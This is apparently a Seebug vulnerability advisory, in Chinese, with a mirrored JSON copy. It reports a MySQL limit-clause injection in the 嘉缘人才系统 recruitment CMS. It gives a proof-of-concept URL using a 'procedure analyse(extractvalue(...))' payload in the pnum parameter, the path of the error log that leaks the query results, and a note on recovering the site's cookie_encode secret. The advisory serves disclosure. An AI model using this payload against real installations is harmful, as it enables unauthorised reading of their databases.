Search...

嘉缘人才系统sql注入(demo测试成功,limit注入实例)

2015-03-13T00:00:00

ID SSV:94662
Type seebug
Reporter Root
Modified 2015-03-13T00:00:00

Description

简要描述：

详细说明：

直接黑盒发现

http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum=

其中pnum为可控,随意输入一个字符发现mysql报错

这个cms会把报错信息存在一个日志文件，如何获取这个日志文件，在前面发的洞中有详细的说明 WooYun: 嘉缘人才系统最新版sql注入(直接出数据) 首先我们来获取$cfg['cookie_encode']

把上面标注的base64解密，得到testUzEZa4962Q，其中test为我的用户名。然后

UzEZa4962Q

就为$cfg['cookie_encode']。好了，找到之后，我们来构造poc 根据http://zone.wooyun.org/content/18220提供的方法构造以下poc

http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)

然后访问mysql错误记录文件

http://v2014.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt

可以看到直接出数据了。

漏洞证明：

JSON Vulners Source

Initial Source

{"type": "seebug", "lastseen": "2017-11-19T12:35:30", "href": "https://www.seebug.org/vuldb/ssvid-94662", "cvss": {"score": 0.0, "vector": "NONE"}, "modified": "2015-03-13T00:00:00", "reporter": "Root", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\nrt\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n\u76f4\u63a5\u9ed1\u76d2\u53d1\u73b0\n\n\n```\nhttp://v2014.rccms.com/person/resumelist.php?t=sideline&pnum=\n```\n\n\n\u5176\u4e2dpnum\u4e3a\u53ef\u63a7,\u968f\u610f\u8f93\u5165\u4e00\u4e2a\u5b57\u7b26\u53d1\u73b0mysql\u62a5\u9519\n\n\n[<img src=\"https://images.seebug.org/upload/201503/12195242bc5029d39e7e0b104532c02379e4940f.png\" alt=\"18.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201503/12195242bc5029d39e7e0b104532c02379e4940f.png)\n\n\n\u8fd9\u4e2acms\u4f1a\u628a\u62a5\u9519\u4fe1\u606f\u5b58\u5728\u4e00\u4e2a\u65e5\u5fd7\u6587\u4ef6\uff0c\u5982\u4f55\u83b7\u53d6\u8fd9\u4e2a\u65e5\u5fd7\u6587\u4ef6\uff0c\u5728\u524d\u9762\u53d1\u7684\u6d1e\u4e2d\u6709\u8be6\u7ec6\u7684\u8bf4\u660e\n [WooYun: \u5609\u7f18\u4eba\u624d\u7cfb\u7edf\u6700\u65b0\u7248sql\u6ce8\u5165(\u76f4\u63a5\u51fa\u6570\u636e)](http://www.wooyun.org/bugs/wooyun-2015-0100830) \n\u9996\u5148\u6211\u4eec\u6765\u83b7\u53d6$cfg['cookie_encode']\n\n\n[<img src=\"https://images.seebug.org/upload/201503/121955463edf4d6282aec9265ca2aca337d20456.png\" alt=\"19.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201503/121955463edf4d6282aec9265ca2aca337d20456.png)\n\n\n\u628a\u4e0a\u9762\u6807\u6ce8\u7684base64\u89e3\u5bc6\uff0c\u5f97\u5230testUzEZa4962Q\uff0c\u5176\u4e2dtest\u4e3a\u6211\u7684\u7528\u6237\u540d\u3002\n\u7136\u540e\n\n```\nUzEZa4962Q\n```\n\n\u5c31\u4e3a$cfg['cookie_encode']\u3002\u597d\u4e86\uff0c\u627e\u5230\u4e4b\u540e\uff0c\u6211\u4eec\u6765\u6784\u9020poc\n\u6839\u636ehttp://zone.wooyun.org/content/18220\u63d0\u4f9b\u7684\u65b9\u6cd5\n\u6784\u9020\u4ee5\u4e0bpoc\n\n\n```\nhttp://v2014.rccms.com/person/resumelist.php?t=sideline&pnum=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)\n```\n\n\n\u7136\u540e\u8bbf\u95eemysql\u9519\u8bef\u8bb0\u5f55\u6587\u4ef6\n\n\n```\nhttp://v2014.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt\n```\n\n\n\u53ef\u4ee5\u770b\u5230\u76f4\u63a5\u51fa\u6570\u636e\u4e86\u3002\n\n\n[<img src=\"https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png\" alt=\"20.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png)\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png\" alt=\"20.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png)", "bulletinFamily": "exploit", "references": [], "viewCount": 1, "status": "details", "sourceHref": "", "cvelist": [], "enchantments_done": [], "title": "\u5609\u7f18\u4eba\u624d\u7cfb\u7edfsql\u6ce8\u5165(demo\u6d4b\u8bd5\u6210\u529f,limit\u6ce8\u5165\u5b9e\u4f8b)", "id": "SSV:94662", "sourceData": "", "published": "2015-03-13T00:00:00", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2017-11-19T12:35:30", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T12:35:30", "rev": 2}, "vulnersScore": -0.0}}